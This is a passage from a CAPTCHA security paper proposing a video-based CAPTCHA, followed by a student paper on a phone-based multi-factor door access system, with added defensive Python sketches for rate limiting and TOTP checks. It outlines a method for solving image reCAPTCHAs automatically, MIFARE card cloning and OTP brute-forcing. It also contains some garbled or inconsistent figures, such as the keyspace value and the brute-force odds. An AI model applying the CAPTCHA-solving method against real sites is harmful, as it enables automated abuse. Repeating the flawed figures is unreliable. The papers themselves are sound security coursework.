Documented attempts to break the image-based CAPTCHA have been mildly successful; by utilizing several image annotation tools - one of them being Google’s own Google Reverse Image Search (GRIS) - and aggregating the classification results, a group of university students were able to solve a stratified sample of reCAPTCHA tests programmatically with up to 60% accuracy. [4] The algorithm for solving a single CAPTCHA process is as follows:
1. Identify target object name.
2. Extract the first image from the CAPTCHA and feed it into the image annotation module to obtain the image classifier tags.

3. Compare the object name with the tags; if a match is found, select the image.
4. Repeat steps 2-3 for the remaining 8 CAPTCHA images.
By further storing and reusing the classification results from the above algorithm, Google’s large database of object images, the solving accuracy increased to 70%.
Due to the performance bottleneck in the image classification phase, each CAPTCHA process took an average of 20 seconds. The demonstration highlights the need for enhancements to this type of CAPTCHA method.

3.3 Behavior Analysis
Shortly after their release of the object-based CAPTCHA, reCAPTCHA introduced an enhancement to its CAPTCHA system that only requires users to check a tick box. [5] Titled NoCAPTCHA, it uses advanced risk analysis that tracks the entire user interaction from the point the CAPTCHA widget renders on the web page to the point at which the checkbox is checked. For example, the entire path of the mouse pointer taken by a human and a bot differs significantly, and can be leveraged on to distinguish between authentic users and spammers (programmable webdrivers like Selenium would trigger the checkbox instantaneously).

Figure 4: One-click CAPTCHA widget by Google’s reCAPTCHA

Although the parameters collected for risk analysis are not officially disclosed by Google due to security reasons, a reverse engineering attempt on reCAPTCHA’s client-sided javascripts identified that the following information were collected prior to the actual verification [6]:
1. Plug-ins
2. User-agent
3. Screen resolution
4. Execution time, timezone
5. Number of click/keyboard/touch actions in the <iframe> of the captcha
6. Behavior of browser-specific functions and CSS rules
7. Render result of canvas elements
8. Cookies

3.4 Code Obfuscation
The reverse engineering attempt mentioned in Section 3.3 also discovered that reCAPTCHA heavily obfuscated the client sided code that was used to load the CAPTCHA widget. [6] Specifically, the script contained compiled javascript bytecode that was executed on the client side after the resource was fetched. Although code obfuscation is not an entirely secure method of protecting the CAPTCHA implementation from being exploited, it definitely makes the exploit process more tedious and deters less technically proficient abusers from attempting such an act.

3.5 Invisible CAPTCHA
reCAPTCHA’s latest release (2017) took its one-click CAPTCHA a step further by removing any form of user interaction altogether. [7] By analyzing information of the browser used to access the webpage, as well as user browsing history through the use of cookies, reCAPTCHA is able to identify if the incoming traffic is from a human or a bot.

3.6 Video-based CAPTCHA
We take a look at video-based CAPTCHAs offered by NuCaptcha. NuCaptcha displays animated distorted texts in a video which typically scrolls from one edge of the screen to another, and users are required to enter the text that is in a different color than the rest. Random unrelated clips will be played in the background to increase the difficulty for machines to identify the moving texts. [8]

4. VIDEOCAPTCHA

4.1 Introduction
VideoCaptcha uses the idea that it is harder for bots to process information through animation compared to static images and is computationally harder to perform analysis.
The video captcha will show a few images at random and display a short clip that is related to at least one of the displayed images. The user will then be prompted to answer a question and select the image that best fits as the response. If the user has selected the correct response, then they will be re-directed to the target page. Otherwise, a new set of clip and images will be randomly chosen and displayed.

Figure 5. VideoCaptcha example

The difference between VideoCaptcha and NuCaptcha is that VideoCaptcha expects users to identify objects or actions in the video.

4.2 Considerations

4.2.1 Lack of answer choices
As seen from the initial design in Figure 5, users have to choose exactly one correct answer from the 4 choices. This multiple-choice constraint suggests that bots are able to constantly

select the first option and still achieve a theoretical 25% success.

4.2.2 Accessibility
Similar to other visual-based CAPTCHAs, users with difficulty in seeing will be unable to perform the CAPTCHA test properly.

4.2.3 Human computation
This captcha may remain vulnerable if the attacker manages to do a run through all of our captcha and stores the captcha and its corresponding answers in their knowledgebase. By doing so, it allows bots created by the attacker to be able to conduct successful attacks by searching their database and replaying the answer, assuming that storage at attacker’s side is possible.

4.2.4 Denial of Service
Many bots can flood our server by constantly and deliberately selecting the wrong answer. This may prevent genuine access by the users who are trying to access the page.

5. Enhancements

5.1.1 Improving answer choices
Increasing the number of choices will reduce the chance of successful attack. Alternatives include enhancing our video along with a text captcha, and adding a secondary open-ended question which requires another input from the user. This alternative enhancement is inspired by NuCaptcha. The questions to be asked here will be similar to that of a normal text captcha i.e. “Type in the two words displayed in the video”. Furthermore, this text input will always be a random input of string that is generated every time then placed into the video. Thus, with another layer of check, our video CAPTCHA will be more reliable and less prone to attacks.

5.1.2 Improving Accessibility
An audio-based CAPTCHA could be implemented in the video CAPTCHA to allow people who are disabled to be able to gain access.

5.1.3 Preventing Human Computation
Upon improving the answer choices with the alternative method of adding an additional text input field where text is also a random string of text generated that will be placed in the video, our keyspace will be significantly huge. Additionally, human computation attack can be prevented by tracking using our own personal logs (e.g. htAccess/cPanel). Through such tracking, we will be able to detect the user that is currently attempting to store our videos, images and text. After which, simply ban this user. As such, the attacker is highly unlikely to be able to store all possible sets of answers, especially when the text is always randomly generated, before inserting into the video.

5.1.4 Preventing Denial of Service
A general idea of preventing DOS is to impose lower bandwidth and query resource from any source/client after every single attempt and access to our webpage. An implementation of imposing a fixed number of tries a particular user can fail before imposing a time penalty (e.g. 10 mins) is one way whereby we can reduce the chance of a DOS attack. This can be done by tracking the IP address of the client. To further enhance this implementation, another timer can be set and tracked for every user, where every user that sends a request instantaneously to our server will be rejected as this ‘user’ is likely to be non-human.
Another scheme that we have thought of is to create another time period scheme that is inspired by NoCAPTCHA reCAPTCHA. In this additional implementation, we will impose a timeout period (e.g. 10s) for every user before we close the session with the user. By doing so, other users will be more likely to be able to access this page as no other user can remain in the page beyond the stipulated time period.

6. ACKNOWLEDGEMENTS
We would like to show our appreciation to Dr. Hugh Anderson for presenting us the opportunity to explore on the topic regarding CAPTCHA.

7. REFERENCES
[1] “Advanced Web Scraping: Bypassing "403 Forbidden," captchas, and more”. Evan Sangaline. 2017-03-14. Retrieved 26 Oct 2017. http://sangaline.com/post/advanced-web-scraping-tutorial/
[2] “Captcha Technologies Market Share and Web Usage Statistics”. SimilarTech. Retrieved 2017-11-04. https://www.similartech.com/categories/captcha
[3] “Section 508 CAPTCHA: How to Make CAPTCHA Comply with Access Board Section 508 Standards”. Captcha.com. Retrieved 2017-11-04. https://captcha.com/accessibility/section508-captcha.html
[4] Claudia Cruz-Perez; Oleg Starostenko; Fernando Uceda-Ponga; Vicente Alarcon-Aquino; Leobardo Reyes-Cabrera (30 June 2012). "Breaking reCAPTCHAs with Unpredictable Collapse: Heuristic Character Segmentation and Recognition". In Carrasco-Ochoa, Jesús Ariel; Martínez-Trinidad, José Francisco; Olvera López, José Arturo; Boyer, Kim L. Pattern Recognition. Lecture Notes in Computer Science. 7329. México. pp. 155–165. doi:10.1007/978-3-642-31149-9_16. ISBN 978-3-642-31148-2.
[5] "Are you a robot? Introducing "No CAPTCHA reCAPTCHA"". Google. 2014-12-03. Retrieved 2017-11-04. https://security.googleblog.com/2014/12/are-you-robot-introducing-no-captcha.html
[6] “InsideReCaptcha”. ReCaptchaReverser. 2014-12-10. Retrieved 2017-11-04. https://github.com/neuroradiology/InsideReCaptcha
[7] Certification, Digital (2017-03-14). "Digital Certification: The Digital Rating For Websites". Digital Certification | Blog. Retrieved 2017-11-04. https://digital-certification.com/blog/google-improves-their-captcha-with-no-user-interaction-required/
[8] "Animated CAPTCHA tech aims to fox spambots". The Register. Retrieved 2017-11-04. https://www.theregister.co.uk/2010/07/01/animated_captcha/
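
Section 2.1.2's mitigation (expiring, one-time challenge ids) and the limits proposed in Section 5.1.4 (a fixed number of failed tries before a time penalty, rejecting instantaneous answers), combined in one added Python sketch; this is not VideoCaptcha's own code. The class and function names, the three-failure threshold and the one-second minimum are assumptions, while the 10 s and 10 min values are the page's examples.

```python
import hmac
import secrets
import time

CHALLENGE_TTL = 10     # seconds before a challenge expires (the page's 10 s example)
PENALTY = 600          # lock-out after repeated failures (the page's 10 min example)
MAX_FAILURES = 3       # assumed value; the page only says "a fixed number of tries"
MIN_SOLVE_TIME = 1.0   # assumed threshold for an "instantaneous" answer


class CaptchaGate:
    """Tracks issued challenges and per-client failures (client = IP address here)."""

    def __init__(self, clock=time.monotonic):
        self._clock = clock
        self._challenges = {}   # challenge id -> (client, answer, issued_at)
        self._failures = {}     # client -> (failure count, locked_until)

    def locked(self, client):
        return self._clock() < self._failures.get(client, (0, 0.0))[1]

    def issue(self, client, answer):
        """Store the expected answer server-side and return a fresh one-time id."""
        if self.locked(client):
            return None
        now = self._clock()
        # Drop expired challenges so abandoned ones cannot pile up.
        self._challenges = {c: e for c, e in self._challenges.items()
                            if now - e[2] <= CHALLENGE_TTL}
        cid = secrets.token_urlsafe(16)
        self._challenges[cid] = (client, answer, now)
        return cid

    def check(self, client, cid, response):
        """Return 'ok' or the refusal reason; an id is consumed by its first use."""
        if self.locked(client):
            return "locked"
        entry = self._challenges.get(cid)
        if entry is None or entry[0] != client:
            return self._fail(client, "unknown-or-replayed")
        del self._challenges[cid]            # one-time use: a replay finds nothing
        age = self._clock() - entry[2]
        if age > CHALLENGE_TTL:
            return "expired"                 # not counted as a failed try
        if age < MIN_SOLVE_TIME:
            return self._fail(client, "too-fast")
        if not hmac.compare_digest(entry[1].encode(), response.encode()):
            return self._fail(client, "wrong")
        self._failures.pop(client, None)
        return "ok"

    def _fail(self, client, reason):
        count = self._failures.get(client, (0, 0.0))[0] + 1
        until = self._clock() + PENALTY if count >= MAX_FAILURES else 0.0
        self._failures[client] = (0 if until else count, until)
        return reason
```

Because the expected answer never leaves the server and each id is deleted on first use, a stored id/answer pair is worthless on the next request, and a client that keeps submitting wrong answers locks only itself out.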

Smart Door Authentication System

Tan Jia Shun, National University of Singapore, jiashun.t@u.nus.edu
Tan Wang Leng, National University of Singapore, wangleng@u.nus.edu
Tean Zheng Yang, National University of Singapore, teanzhengyang@u.nus.edu
Teddy Hartanto, National University of Singapore, hartantoteddy@u.nus.edu
Yang Jung Kai, National University of Singapore, A0121593@u.nus.edu

ABSTRACT
The NUS smart card system is currently being used to restrict unauthorized students from being able to access certain sensitive areas of the school compound. However, at present, smart cards are becoming increasingly vulnerable to attacks such as cloning. An attacker could make use of current technologies in order to obtain a clone of a valid NUS smart card to gain access to restricted areas. Hence, this paper will explore the feasibility of a Smart Door Authentication system which employs Multi-factor Authentication, using phones as a replacement for the currently insecure NUS smart cards.

1. INTRODUCTION
The usage of smart cards is becoming increasingly commonplace due to the innovation of new Near Field Communication (NFC) technologies. These cards are being used in various different ways ranging from pay-wave systems such as VISA Paywave to area access using NUS Matriculation cards.
However, as the populace trends towards the usage of these cards, new efficient and effective methods are being developed towards the attack of these cards as well. Therefore, there is a need for a new system that would provide a higher level of security than the current one that we have now.

2. EXISTING SYSTEM
In 1994, MIFARE Classic revolutionized the contactless smart card business by introducing a low-cost smart card that was able to transmit encrypted data.
Currently, it is being used in a variety of applications worldwide, including our NUS matriculation card. However, in 2009, a new and improved attack on MIFARE classic was discovered. The attack allows the adversary to recover the secret key via wireless interaction with less than 500 queries to the vulnerable card.
In spite of this vulnerability, the NUS matriculation cards that we use today for authentication are MIFARE Classic cards. The implication of the continual usage of vulnerable cards is that they are very susceptible to being cloned. A cloned MIFARE Classic card would be able to grant an adversary access to restricted areas in the school compound, which in turn would be detrimental to the school’s general security.
Previous students of this module have done projects regarding the exploit of MIFARE Classic Cards (Exploiting the Security Lapses in the NUS Matriculation Card, 2016/17). Hence we shall not go into detail about how to exploit the current system, but rather explore the possibility of a more secure system.
On top of the vulnerabilities associated with the MIFARE Classic cards, there are also numerous ways a user could exploit the NUS smart card system. For example, the smart card could be obtained by an unauthorized adversary via an existing student or staff. The adversary could obtain the card in numerous ways such as getting it willingly from the authorized personnel himself, stealing it from an authorized personnel via social engineering means or even just perhaps picking up a missing card from the floor. Once an unauthorized adversary has obtained an NUS smart card, he could use the card to enter areas which he normally would not be able to access. This is a large security flaw as due to the nature of NFC technology used, the identity of the authorized personnel is often not verified against the identity of the person using the card. For example, a non-student adversary could access the student labs or the central library by putting a student’s NUS smart card in his wallet and by utilizing NFC to grant him access to these restricted areas, his identity as a non-student will not be revealed.

3. PROPOSED SYSTEM
The Smart Door Authentication system taps on multi-factor authentication in order to improve security in the field of area access. The aim of our system is to provide a higher level of security without compromising too much on the ease of use. Therefore, we propose the use of mobile phones to replace the currently insecure MIFARE Classic NUS Matriculation cards. In the system we propose, we use fingerprint biometric authentication, issue two separate One Time Pass (OTP), one for the Door and one for the student, as well as an IVLE token to validate the student’s identity.
Multi-factor authentication is a method of access control. A user is only granted access after presenting several separate pieces of evidence to an authentication mechanism. The evidence typically consists of at least two of the following categories: knowledge (what they know), possession (what they have) and inherence (what they are).
Each student’s phone is bound to his or her unique student id. The student uses an Android application in order to scan a unique RFID or QR code of a door the student wishes to access.
The Android application will verify the validity of the student’s request by checking his fingerprint and student data against the respective databases.

This allows us to identify the student based on their knowledge (via the IVLE token), possession (phone) and their inherence (via fingerprinting).

Our system currently consists of 3 major software components that handle the request to open the door: the Door Server, the Android application and the Database.

The prototype implementation of the system can be found at https://github.com/CS3235-1718-SEM1.

The overall schema is shown in the Appendix section.

3.1 Door Server
The purpose of the Door Server is to handle the requests from the Android application to open the door, to validate the request and to open the door if authorized.

To prevent replay attacks, there are two OTPs in our system:

• Door OTP: Each door has a rotating One Time Pass (OTP) which changes at regular intervals. This is to enforce the rule that the user has to be in the physical location in order to unlock the door.
• Student OTP: Each student also has a rotating One Time Pass (OTP) which is derived from a unique IVLE token upon login, to prevent their secret key from being stolen via NFC sniffing.

The user will scan the door’s OTP using the Android application, which reads the OTP via NFC or by scanning the QR code. After that, the user will have to validate his identity by performing a biometric authentication via the phone's fingerprint scanner. This will authorize the application to generate the student’s OTP. The application will then perform an HTTPS POST request with the student’s matriculation number, OTP and the door’s id and OTP to the Door Server.

The Door Server will validate that the door_id exists and that the submitted OTP matches the door’s OTP, which the Door Server generates itself to compare against the submitted one. Once validated, it forwards the door_id, the student’s matriculation number and OTP to the database server via an HTTPS POST request for validation of the student’s identity and access rights. What happens next depends on the database server’s reply. If the reply is “200”, representing validated and authorized, the Door Server will proceed to open the door for the user. Otherwise it will treat the request to open the door as invalid, reply to the Android application’s request with a “400”, which represents that the request has been denied, and drop the request.

Having a unique OTP that is bound to each door requires that the user be physically present at the location to open the door. Otherwise, if the door’s identity is statically assigned (i.e. only needing the door ID) and without any protection, then the door might become more vulnerable to pre-crafted HTTP requests to the Door Server to remotely open doors.

3.2 Android Application
The purpose of the Android Application is to introduce the IVLE authentication and fingerprint verification.

Upon entering the application, the user sees the main menu:

Figure 1: Illustration of Android Application

The main menu contains 3 buttons:

• Settings: Only for debugging and prototyping purposes (to allow us to configure the HTTP request URLs). This button will not be available in the actual application.
• Login: Leads the user to the stage of registering the smartphone with the door access system. The user will have to visit the Computer Centre to complete this stage.
• Scan: Scan the QR code for a particular door. This is used when the user is trying to unlock the door.

There is no button for NFC because the user will just need to bring his phone near to the NFC emitter to start the unlocking process, rather than having to press a button.

3.2.1 Process: Registering Smartphone
Upon pressing the “Login” button, the user is led to an IVLE login page. The user enters his credentials, and then the application will initiate an HTTPS request to the registration database to authorize the phone. A secret key will be returned by the registration database, which is then stored in the local storage. This secret key will be used for the student OTP generation. At this stage, if the user misplaces or changes the registered phone, he has to visit the Computer Centre as the personnel will have to configure the database to accept the new phone (this is a mechanism to prevent the user from registering multiple phones. Only one phone is allowed per student).

3.2.2 Process: Unlocking Door
There are two ways the user can unlock the door:

• Scanning through QR code

The user will tap the “Scan” button on the main menu. He or she will then proceed to scan the QR code on the door (which is the door’s id and OTP). The fingerprint authentication screen is brought up afterwards.

• Scanning via NFC
Instead of tapping any button, the user will just have to be on the main menu, and bring his phone near the door’s NFC emitter. The application will pick up the NFC record (which contains the door’s id and OTP), and bring the user to the fingerprint authentication screen.

Both methods bring the user to the authentication stage. Upon scanning the user’s fingerprint, the application initiates an HTTPS request to the Door Server with all the necessary information (OTPs, door and user id) in order to unlock the door.

3.3 Database Access Layer
The purpose of the Database Access Layer is to provide verification of the incoming requests against known and pre-collected data.

The Database Access Layer is simply an HTTPS RESTful API that abstracts away database accesses. Currently, the API exposes 2 endpoints, one for the Door Server, and the other for the Android client.

3.3.1 Android Client
POST /register_user
This endpoint is called the first time a user successfully logs in to IVLE using the Android app. It takes in 2 parameters: the IVLE auth_token, and the IVLE_id. Once a request is received, it proceeds to verify the user’s claimed identity by checking the given auth_token against IVLE LAPI. Upon a successful verification, it fetches the list of doors the user is permitted to access and generates a secret_key tied to this identity. All of these are stored in the database. Upon a successful request, an HTTP 200 response will be returned, 401 if the claimed identity is invalid, and 403 if the user has already been registered in the system.

The database imposes the constraint that the user can only have one phone registered in the system. Because the user must authenticate using his/her fingerprint to open a door, opening a door for a friend/outsider implies that the user must accompany the said person. This is an effort to protect against user non-compliance, in which, using the old mechanism, an NUS student/staff can just lend his/her card to an outsider. At the same time, this mechanism ensures non-repudiation of room access.

The secret_key tied to the user’s identity is a base32 string of 40 characters. The keyspace of this secret key is 32 3139. Even with a number of supercomputers, it will be the end of the universe before the attacker can get the correct secret key.

3.3.2 Door Server
POST /can_access_door
This endpoint is to check if a user can access a specific door. It accepts 3 parameters: the door_id, IVLE_id, and the OTP. The endpoint returns an HTTP 200 response if the OTP is valid. The Door Server will be informed whether the user has the required permission to access the corresponding door. Otherwise, an HTTP 400 response is returned.

The OTP is generated from the user’s secret_key and changes at a regular interval. To protect against a brute-force attempt on the OTP, the system records the last room access request and only accepts 3 room access requests per second. This significantly reduces the number of guesses an attacker can make on the OTP. Because the OTP changes every 30 seconds, the attacker can only make 90 brute-force attempts, out of the 10⁶ keyspace of the OTP. As such, the probability of a successful brute-force attack is roughly 1 in 10,000.

4. STRENGTHS AND WEAKNESSES OF PROPOSED SYSTEM

4.1 Strengths and Evaluations
Our authentication system provides significantly higher security in the field of area access compared to the current NUS Matriculation Card.

4.1.1 Multi-factor Authentication
It is very difficult for an adversary to obtain the student’s fingerprint, phone and IVLE login information required to gain access to the restricted area. Compared to the currently employed solution which uses the vulnerable NUS matriculation card, it is harder for an adversary to attack. This is based on the utilization of the 3 different factors of authentication in multi-factor authentication.

However, we have noted the case whereby once a student is logged into IVLE, he would not have to log in again. This would reduce our system to a 2-factor authentication system, which in turn would entail lower security. We could enforce the need to sign in every single time the student wishes to access a door. However, we feel that this will not be very intuitive to use for the user.

Hence, perhaps we could simplify the system whereby the student does not have to log in every single time he wants to access an area for the lower risk areas such as the NUS library. However, every time a student wishes to enter a more sensitive area such as research labs, he will be required to provide his IVLE credentials, effectively enforcing the third factor of authentication in our system.

4.1.2 Enforcing Non-Repudiation of Room Access
In our current MIFARE smart card system, it is very difficult to verify that the owner of the card is actually the person that is tapping for room access. Therefore, should any incident happen in the room, the owner of the card can deny responsibility by claiming that he or she has lost the card, and did not personally enter the room.

It is easy for a person to lend his or her card to unauthorized personnel. For example, student Harry wants to enter a room that he has no access to. He could approach student Alice, who has access, and ask to borrow her card. That way, Harry can gain access to the room even without the presence of Alice, as tapping the card is sufficient to enter the room.

With our smartphone application, it is difficult for another person to enter the room without the presence of the actual owner. Lending the smartphone to another person is insufficient, as the fingerprint authentication is required to unlock the door. Furthermore, a smartphone is more expensive than a smartcard (virtually $0 for the student), so the student will be more conscious about losing a smartphone versus a matriculation card.

By doing so, we have effectively enforced non-repudiation of room access. Even if the person is not present in the room, any incident that occurs will be directly his or her legal responsibility, as he or she has authorized the access to the room.

4.1.3 Resistant against Brute Force or Cloning Attacks
The student’s OTP is a 6 digit number that is generated using the secret key. It is time-based, so a particular generated OTP is only valid for at most 30 seconds.

It is difficult for a malicious attacker to brute force the secret key (as it is a base32 string of 40 characters). However, the malicious attacker can attempt to brute force the OTP token, by sending multiple HTTP requests to the Door Server, each request containing a different guess of the OTP. As described in the previous section “Database Access Layer”, we thwart such an attempt by limiting requests to only 3 per second.

Hence, with both the request limitation and rotating OTP, brute forcing is theoretically challenging to do.

In contrast, a smartcard does not allow us to support a rotation mechanism (since it is just a card and not a computing device). In fact, as described under the “Existing System” section, cloning is possible since the content of the smartcard never changes, unlike our 30-second OTP.

4.1.4 Psychological Acceptability
Smartphone ownership is prevalent in Singapore. In the Consumer Barometer research study done by Google, 91% of Singapore’s population owns a smartphone.

Therefore, as the prevalence of smartphones propagates throughout the world, it becomes more convenient for students to gain access using their smartphone, rather than relying on them carrying around their matric card. This reduces the need of carrying an additional piece of plastic that would otherwise be not very useful in many other situations.

4.2 Weaknesses and Mitigations
As with the majority of other systems, our system faces several weaknesses from a practicality standpoint.

4.2.1 Fingerprinting authentication: False Negatives
Fingerprints provide an inherence factor in the multi-factor authentication scheme. However, fingerprints are unable to be changed in the same way as passwords or other authentication means. This is significant because if the fingerprint of the student is compromised, the student is unable to change his or her fingerprint data in the database.

Fingerprinting authentication has always been known for instances of common false-negative and false-positive results. Since our system makes use of multi-factor authentication, false positives are less detrimental as access will only be granted if all other factors are positive. However, false-negative results for the fingerprinting authentication may cause significant frustration to the user as his or her access will be denied even if all other factors are positive.

Based on a study done on fingerprint scanners, 85% of examiners made at least one false negative error for an overall false negative rate of 7.5%.

However, in our system, we have not encountered any instances of false negatives in our tests leading up to and during the STEPs presentation. Therefore, perhaps this technology has progressed significantly since the study done in 2010 and increased in reliability since then.

4.2.2 Fingerprinting authentication: Database manipulation
The authenticated fingerprints are currently stored in the smartphone’s fingerprint database.

It is hard to guarantee that the smartphone’s fingerprint database would not be maliciously tampered with. For instance, a user might allow his friend to add his fingerprint to the smartphone, even though such an action virtually allows him access to all functionalities of his smartphone (instead of just the door unlocking application), which poses a greater security risk to the user. Nevertheless, the user may do this out of convenience or ignorance.

A possible form of defence is to store fingerprint authentication information in the database access layer instead of relying on the smartphone’s database.

The Android API does not divulge the fingerprint of the user to the application. Instead, the application has to create a CryptoObject, and the Android API would then sign this object with the user’s fingerprint. Since only the user’s fingerprint can sign the object uniquely (other fingerprints will sign it differently), we can check the signed object with our Database Access Layer to verify that the person is indeed the user that registered his phone to our system, and not someone else who has maliciously gained access to the phone and added his own fingerprint to the smartphone’s database.

With this new mechanism, the access point ‘/can_access_door’ would now require fingerprint authentication data (in the form of a signed object) as an additional parameter, before granting access to the door.

4.2.3 Cost
Our system requires a complete overhaul of the current door authentication system. This may result in astronomical costs when considering the scale of the current door application. While the system is significantly more secure than the current method of using MIFARE Classic cards for authentication, there is no denying the cost-effectiveness of these MIFARE Classic cards.

This is the classic issue of cost vs effectiveness. On one hand we would like to maximize cost savings. However, we would also have to maintain a certain level of security such that there is at least a certain level of difficulty in breaking into the system. We feel that the current system, although cost effective, provides little to no security given the current level of technological advancements.
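The two-OTP check from sections 3.1 and 3.3.2 and the brute-force bound from section 4.1.3, written out as an added Python example that is not taken from the project's repository. It assumes both OTPs are RFC 6238 TOTPs (HMAC-SHA1, 30-second step, 6 digits), collapses the Door Server and the Database Access Layer into one hypothetical `DoorSystem` class with constructed sample data, and goes beyond the paper in one respect: it refuses a second unlock within the same 30-second step, because a time-based OTP on its own can be replayed until it rotates.

```python
import base64
import hashlib
import hmac
import struct

STEP = 30           # seconds an OTP stays valid (paper: 30 s)
DIGITS = 6          # OTP length (paper: 10**6 keyspace)
MAX_PER_SECOND = 3  # access requests accepted per second (paper: 3)


def totp(secret_b32, now, step=STEP, digits=DIGITS):
    """RFC 6238 TOTP (HMAC-SHA1) for a base32 secret at Unix time `now`."""
    key = base64.b32decode(secret_b32, casefold=True)
    counter = struct.pack(">Q", int(now // step))
    mac = hmac.new(key, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                      # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def same(a, b):
    """Constant-time comparison of two OTP strings."""
    return hmac.compare_digest(a.encode(), b.encode())


class DoorSystem:
    """Hypothetical stand-in for the Door Server plus Database Access Layer."""

    def __init__(self, door_secrets, student_secrets, acl):
        self.door_secrets = door_secrets        # door_id -> base32 secret
        self.student_secrets = student_secrets  # IVLE_id -> base32 secret_key
        self.acl = acl                          # IVLE_id -> set of door_ids
        self.recent = {}                        # IVLE_id -> recent request times
        self.last_step = {}                     # IVLE_id -> last accepted time step

    def rate_ok(self, ivle_id, now):
        """Allow at most MAX_PER_SECOND requests per student per second."""
        recent = [t for t in self.recent.get(ivle_id, []) if now - t < 1.0]
        allowed = len(recent) < MAX_PER_SECOND
        if allowed:
            recent.append(now)
        self.recent[ivle_id] = recent
        return allowed

    def unlock(self, door_id, door_otp, ivle_id, student_otp, now):
        """Return 200 to open the door and 400 to deny, as in sections 3.1 and 3.3.2."""
        if not self.rate_ok(ivle_id, now):
            return 400                          # over the request limit
        door_secret = self.door_secrets.get(door_id)
        if door_secret is None or not same(door_otp, totp(door_secret, now)):
            return 400                          # unknown door or stale door OTP
        secret_key = self.student_secrets.get(ivle_id)
        if secret_key is None or not same(student_otp, totp(secret_key, now)):
            return 400                          # unregistered student or wrong OTP
        if door_id not in self.acl.get(ivle_id, ()):
            return 400                          # valid identity, no access right
        step = int(now // STEP)
        if self.last_step.get(ivle_id, -1) >= step:
            return 400                          # beyond the paper: OTP already used
        self.last_step[ivle_id] = step
        return 200


def guess_bound(rate=MAX_PER_SECOND, window=STEP, digits=DIGITS):
    """Guesses an attacker gets per OTP lifetime, and the chance that one hits."""
    attempts = rate * window
    return attempts, attempts / 10 ** digits    # 90 guesses, about 1 in 11,000


def demo_system():
    """Constructed sample data: one door, one student, 40-character base32 secrets."""
    door_secret = base64.b32encode(bytes(range(25))).decode()
    student_secret = base64.b32encode(bytes(range(100, 125))).decode()
    return DoorSystem({"door-1": door_secret}, {"student-1": student_secret},
                      {"student-1": {"door-1"}})


if __name__ == "__main__":
    system, now = demo_system(), 1_000_000.0
    d = totp(system.door_secrets["door-1"], now)
    s = totp(system.student_secrets["student-1"], now)
    print("first request:", system.unlock("door-1", d, "student-1", s, now))
    print("replayed request:", system.unlock("door-1", d, "student-1", s, now + 0.5))
    print("guess bound:", guess_bound())
```

The limiter here is keyed on the IVLE_id, so the 90-guess bound holds per student; a deployment would also want a per-door or per-source limit so that guesses cannot be spread across identities.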

4.2.4 Insider Attacks
If the personnel in the Computer Centre have access to the smartphone door server database, it is possible for a member of the Computer Centre personnel to collude with a malicious student.

The personnel can leak a victim’s secret key to a malicious student’s smartphone app by deliberately hijacking the HTTP request of the smartphone user registration protocol, and then inserting any arbitrary secret key that he or she desires (preferably a victim’s secret key).

The only form of defence against this attack is to ensure that the personnel are never able to inspect the server database content in the first place.

4.2.5 Lost and stolen phones
If a determined attacker armed with the necessary technical expertise and resources decides to target a student to gain access to NUS facilities, and steals and hacks the student’s phone, there is a possibility that the attacker might be able to gain unauthorised access to NUS facilities. We can mitigate this problem. Since we have already implemented the constraint that the user can only have one phone registered in the system, a user must report any loss to the system administrator as soon as possible to regain access to NUS facilities. With this, we will know when phones are compromised and can act quickly to revoke the lost or stolen phone’s ability to open doors.

At the same time we also have to consider the requirements to pull off such an attack on the system.

Firstly, the attacker will have to find an unreported lost phone or steal a phone, then gain root access to the phone and attempt to use it to enter NUS before the administrator can lock the phone’s access. However, we have to consider that today’s smartphones have built-in trackers, allowing owners to locate their phone remotely and making it hard for the attacker to get away with their attack. At the same time, gaining root access to the phone is not a trivial act. It requires significant technical expertise that not every person might have.

The point is raising the bar for hacking the system to make it uneconomical for a casual malicious user. Currently, to gain illegal access one can easily just scan and clone the already cracked MIFARE based matric card, so the bar is extremely low. Our system raises the bar to make it more expensive than it is worth for a casual attacker.

5. POSSIBLE FUTURE ENHANCEMENTS

5.1.1 Taking Attendance at Events
As our smart door authentication system verifies that the person that scans the door is definitely the owner of the smartphone, we can expand the functionality of the system to include non-door unlocking scenarios. One such scenario is attendance taking at events organized by NUS staff.

As attendance taking is a non-security activity (compared to door unlocking), we need a separate server that is similar to the door server, but is crafted for events instead, so as to attain separation of privileges.

Currently, door accesses are logged in a log file and are accessible by security staff for auditing purposes only. As such, to support attendance taking, we will require a more user-friendly GUI for event organizers to use the system with ease, as they will need to access the list of users that have attended the event, and NUS staff are less trained than security personnel. Instead of a log file, the database will also need new functionalities to generate the said list to support attendance taking.

5.1.2 Ease of use and speed of system
Currently, there is only one mode of operation for our system. This mode might not be optimal for every single use case.

For example, in a high traffic and less sensitive location like the NUS library, the additional second spent on scanning the thumbprint on the application might increase the jam of people trying to enter during peak hours. In this case it might be better if the user can just tap his phone on the reader and enter the library.

On the other hand, for high value and sensitive locations like research labs, offices and server rooms, we might want to enable additional requirements, such as every entry requiring the user to enter his or her IVLE user password, or even require another separate hardware authentication factor such as a YubiKey to open the door, to ensure that the person entering this restricted area is indeed authorized.

These various modes can be defined based on a sliding scale on the importance and nature of the room that is being protected. A more sensitive location can require additional validations before opening a door. While this might take additional time, it helps minimize the chances of unauthorized access. Less sensitive locations with high traffic can have fewer validations to help increase the traffic throughput.

6. SUMMARY
We have achieved a proof of concept that our entire system works by creating the whole system from scratch. We have even created a model of a door using servo motors and Arduinos to prove that at least on a small scale, our system can function as a valid door authentication system.

Our system, which utilizes multi-factor authentication in order to identify the person requesting access, is more secure than the currently employed system using MIFARE Classic NUS matriculation cards. However, there are several weaknesses of the system that may affect the practicality of the implementation of the overall system. Perhaps in higher risk areas, our system or a system with a higher security can be used.

MIFARE Classic is also an outdated piece of technology that should be replaced as soon as possible due to security loopholes. As smartphones are prevalent in modern society, we feel that, together with the multitude of sensors that they come with, people will be able to use their phones for access control very often in the near future.

7. GITHUB REPOSITORY
https://github.com/CS3235-1718-SEM1

8. ACKNOWLEDGMENTS
We would like to thank Professor Hugh Anderson for his unwavering support and guidance, as well as provision of hardware to make this project possible. In addition, we would also like to thank ourselves for a job well done as this project would not be possible without the hard work and contribution of every single member in the team.

We would also like to thank everybody for their kind and constructive comments at our STEPs presentation. We hope that with our new found knowledge and wisdom, one day we are able to make the world a safer place, one door at a time.

9. REFERENCES
